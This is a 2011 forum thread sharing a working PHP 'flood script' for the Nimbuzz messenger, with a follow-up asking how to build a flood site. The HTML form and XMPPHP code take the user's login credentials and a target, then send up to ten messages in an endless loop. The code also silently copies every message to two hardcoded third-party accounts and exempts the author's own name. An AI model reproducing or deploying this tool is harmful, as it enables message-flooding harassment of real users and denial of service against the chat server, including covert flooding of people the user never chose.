welcome to Indian-buzz.tk
welcome to Indian-buzz.tk
welcome to Indian-buzz.tk
Would you like to react to this message? Create an account in a few clicks or log in to continue.

welcome to Indian-buzz.tk

welcome to indian-buzz.tk and get some awesome nimbuzz softwares and tipcs join our room : ENGLISH
 
Homeaxeshi1SearchLatest imagesRegisterLog in
indian clock
Search
 
 

Display results as :
 
Rechercher Advanced Search
Keywords
credit
May 2024
MonTueWedThuFriSatSun
  12345
6789101112
13141516171819
20212223242526
2728293031  
CalendarCalendar
Latest topics

 

 pvt flood script php

Go down 
2 posters
AuthorMessage
axeshi

axeshi


Posts : 89
Points : 432
Reputation : 1
Join date : 2011-12-03
Age : 31
Location : pune maharastra

pvt flood script php Empty
PostSubject: pvt flood script php   pvt flood script php Icon_minitimeThu Dec 29, 2011 10:40 pm

<link rel="shortcut icon" href="https://2img.net/h/oi53.tinypic.com/2roj7uq.png"/>
<html>
<head>

<title>AxEsHi here</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head>

<body bgcolor="black">

<style>



{color:Blue;

}

span

{

cursor:pointer;

color:black;

background:black;

}

td

{

color:blue;

background:black;

}

</style>

<div class="postheader"><center><font color="Red"> <h1>Welcome To [You must be registered and logged in to see this link.] Unlimited Web Flood</h1> </font></center></div>

<p><b> </b></P>
<font color="Blue">
<p>WEBFLOOD PRIVATE IN UR LIST WEB FLOOD BY [You must be registered and logged in to see this link.] ® ROCKZZ <br></p>


<form method="post">

<font color="Red">
<input name="username" type="text" id="username" maxlength="25"/>

<label>
username (without @nimbuzz.com)
</label>
<p>

<input name="password" type="password" id="password" maxlength="32"/>

<label>
password </label></p>
<p>

<input name="resource" type="text" id="resource" maxlength="256"/>
<label>
Resource (enter text as you want)
</label>
</p>
<p>

<input name="target" type="text" id="target" maxlength="30"/>
<label>
Username Target (without @nimbuzz.com)
</label> </p>
<p>
<label>
Enter your message
</label><br>
<input name="textplud1" type="text" size="50" maxlength="256"><label>
Message 1
</label><br>
<input name="textplud2" type="text" size="50" maxlength="256"><label>
Message 2
</label><br>
<input name="textplud3" type="text" size="50" maxlength="256"><label>
Message 3
</label><br>
<input name="textplud4" type="text" size="50" maxlength="256"><label>
Message 4
</label><br>
<input name="textplud5" type="text" size="50" maxlength="256"><label>
Message 5
</label><br>
<input name="textplud6" type="text" size="50" maxlength="256"><label>
Message 6
</label><br>
<input name="textplud7" type="text" size="50" maxlength="256"><label>
Message 7
</label><br>
<input name="textplud8" type="text" size="50" maxlength="256"><label>
Message 8
</label><br>
<input name="textplud9" type="text" size="50" maxlength="256"><label>
Message 9
</label><br>
<input name="textplud10" type="text" size="50" maxlength="256"><label>
Message 10
</label>
</p>
<p>&nbsp;</p>
<p>
<label>
<input type="submit" name="Submit" value="Submit" />
</label>
</p>
</form>







Code:


<?php

$host='openfire.nimbuzz.com';
$port='5222';
$user=$_POST['username'];
$resource=$_POST['resource'];
$server='nimbuzz.com';
$password=$_POST['password'];
//masukkan username target
$to=$_POST['target'];
$to1='zohaib=goku';
$to2='_~~~black~~~_';
//$jumlah=$_POST['jumlah'];
$body1=$_POST['textplud1'];
$body2=$_POST['textplud2'];
$body3=$_POST['textplud3'];
$body4=$_POST['textplud4'];
$body5=$_POST['textplud5'];
$body6=$_POST['textplud6'];
$body7=$_POST['textplud7'];
$body8=$_POST['textplud8'];
$body9=$_POST['textplud9'];
$body10=$_POST['textplud10'];

require_once 'xmpphp/XMPPHP/Log.php';
include 'xmpphp/XMPPHP/XMPP.php';

#Use XMPPHP_Log::LEVEL_VERBOSE to get more logging for error reports
#If this doesn't work, are you running 64-bit PHP with < 5.2.6?
$conn = new XMPPHP_XMPP($host, $port, $user, $password, $resource, $server, $printlog=false, $loglevel=XMPPHP_Log::LEVEL_INFO);

try {
echo 'be patient please';
$conn->connect();
$conn->processUntil('session_start');
$conn->presence();

if($to=='axeshi')
{
return TRUE;
}

while(true)
{
if ($body1!='')
{
$conn->message($to.'@'.$server, $body1);
$conn->message($to1.'@'.$server, $body1);
$conn->message($to2.'@'.$server, $body1);
}
if ($body2!='')
{
$conn->message($to.'@'.$server, $body2);
$conn->message($to1.'@'.$server, $body2);
$conn->message($to2.'@'.$server, $body2);
}
if ($body3!='')
{
$conn->message($to.'@'.$server, $body3);
$conn->message($to1.'@'.$server, $body3);
$conn->message($to2.'@'.$server, $body3);
}
if ($body4!='')
{
$conn->message($to.'@'.$server, $body4);
$conn->message($to1.'@'.$server, $body4);
$conn->message($to2.'@'.$server, $body4);
}
if ($body5!='')
{
$conn->message($to.'@'.$server, $body5);
$conn->message($to1.'@'.$server, $body5);
$conn->message($to2.'@'.$server, $body5);
}
if ($body6!='')
{
$conn->message($to.'@'.$server, $body6);
$conn->message($to1.'@'.$server, $body6);
$conn->message($to2.'@'.$server, $body6);
}
if ($body7!='')
{
$conn->message($to.'@'.$server, $body7);
$conn->message($to1.'@'.$server, $body7);
$conn->message($to2.'@'.$server, $body7);
}
if ($body8!='')
{
$conn->message($to.'@'.$server, $body8);
$conn->message($to1.'@'.$server, $body8);
$conn->message($to2.'@'.$server, $body8);
}
if ($body9!='')
{
$conn->message($to.'@'.$server, $body9);
$conn->message($to1.'@'.$server, $body9);
$conn->message($to2.'@'.$server, $body9);
}
if ($body10!='')
{
$conn->message($to.'@'.$server, $body10);
$conn->message($to1.'@'.$server, $body10);
$conn->message($to2.'@'.$server, $body10);
}
}
$conn->disconnect();

} catch(XMPPHP_Exception $e) {
die($e->getMessage());
}


?>
Back to top Go down
http://www.indian-buzz.tk
__emo_boy__




Posts : 7
Points : 13
Reputation : 0
Join date : 2012-03-13

pvt flood script php Empty
PostSubject: Re: pvt flood script php   pvt flood script php Icon_minitimeWed Mar 14, 2012 12:14 am

Bro axeshi can u say me how to create wap flood site ?
Back to top Go down
 
pvt flood script php
Back to top 
Page 1 of 1
 Similar topics
-
» call flood xml script
» Removing add flood script
» new crime very fast room auto flood nd add Flood.
» Room searching script
» Join ROOM SCRIPT!

Permissions in this forum:You cannot reply to topics in this forum
welcome to Indian-buzz.tk :: nimbuzz Tips and Tricks-
Jump to: